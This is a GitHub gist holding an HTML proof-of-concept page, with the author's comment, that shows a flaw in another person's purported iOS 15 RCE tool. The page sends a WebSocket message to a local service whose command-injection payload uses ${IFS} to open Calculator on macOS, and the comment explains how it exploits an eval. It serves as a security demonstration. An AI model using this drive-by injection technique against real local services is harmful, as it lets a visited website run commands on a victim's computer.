Skip to content

Instantly share code, notes, and snippets.

@matt-
Last active Jan 31, 2022
Embed
What would you like to do?
An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1 https://twitter.com/mattaustin/status/1447787504837398530
<!doctype html>
<html lang="en" class="h-100">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Bootstrap CSS -->
<link href="https://getbootstrap.com/docs/5.0/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
<title>RCE for the RCE</title>
<style>
/*
* Globals
*/
.bd-placeholder-img {
font-size: 1.125rem;
text-anchor: middle;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
}
@media (min-width: 768px) {
.bd-placeholder-img-lg {
font-size: 3.5rem;
}
}
/*
* Globals
*/
/* Custom default button */
.btn-secondary,
.btn-secondary:hover,
.btn-secondary:focus {
color: #333;
text-shadow: none; /* Prevent inheritance from `body` */
}
/*
* Base structure
*/
body {
text-shadow: 0 .05rem .1rem rgba(0, 0, 0, .5);
box-shadow: inset 0 0 5rem rgba(0, 0, 0, .5);
}
.cover-container {
max-width: 42em;
}
/*
* Header
*/
.nav-masthead .nav-link {
padding: .25rem 0;
font-weight: 700;
color: rgba(255, 255, 255, .5);
background-color: transparent;
border-bottom: .25rem solid transparent;
}
.nav-masthead .nav-link:hover,
.nav-masthead .nav-link:focus {
border-bottom-color: rgba(255, 255, 255, .25);
}
.nav-masthead .nav-link + .nav-link {
margin-left: 1rem;
}
.nav-masthead .active {
color: #fff;
border-bottom-color: #fff;
}
</style>
</head>
<body class="d-flex h-100 text-center text-white bg-dark">
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="mb-auto">
</header>
<main class="px-3 text-end">
<h1 style="font-size: 90px; color:#0000;">MA</h1>
<h1 style="font-size: 80px">Matt Austin</h1>
<p class="lead" style="color:#d0e4f8; font-size: 1.5em;">RCE for the "RCE" V1.0 PoC iOS 15.0.1 (By Jonathan Scott)</br>
Developed by <a href="https://twitter.com/mattaustin" class="text-white">Matt Austin</a></p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary fw-bold border-white bg-white" onclick="send()">► Start</a>
</p>
</main>
<footer class="mt-auto text-white-50">
<p>© ®2021 Matt Austin by <a href="https://twitter.com/mattaustin" class="text-white">@mattaustin</a>.</p>
</footer>
</div>
<script>
let socket = new WebSocket("ws://127.0.0.1:8081/");
socket.onopen = function(e) {
console.log("[open] Connection established");
console.log("Sending to server");
};
socket.onmessage = function(event) {
console.log(`[message] Data received from server: ${event.data}`);
};
socket.onclose = function(event) {
console.log('[close] Connection died');
};
socket.onerror = function(error) {
console.log(`[error] ${error.message}`);
};
function send(){
socket.send("`open${IFS}-a${IFS}Calculator;`");
}
</script>
</body>
</html>
@matt-
Copy link
Author

matt- commented Jan 3, 2022

@Hackdwerg Why not?

If you are running the fake RCE By Jonathan Scott from: https://github.com/jonathandata1/ios_15_rce
you can see that it calls an eval at: https://github.com/jonathandata1/ios_15_rce/blob/master/wsmanager.sh#L188

If you view this page (https://maustin.net/hax/rce_poc_poc.html) while running his exploit and click the button it makes a websocket call at https://gist.github.com/matt-/c3028fa85d2d4f599351344ea7502865#file-index-html-L130 to exploit the eval and runs open${IFS}-a${IFS}Calculator; open the calculator on macos.

If an attacker can create a website that executes code and makes system calls on your computer simply by viewing it I consider it an RCE. Can you explain why you don't?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment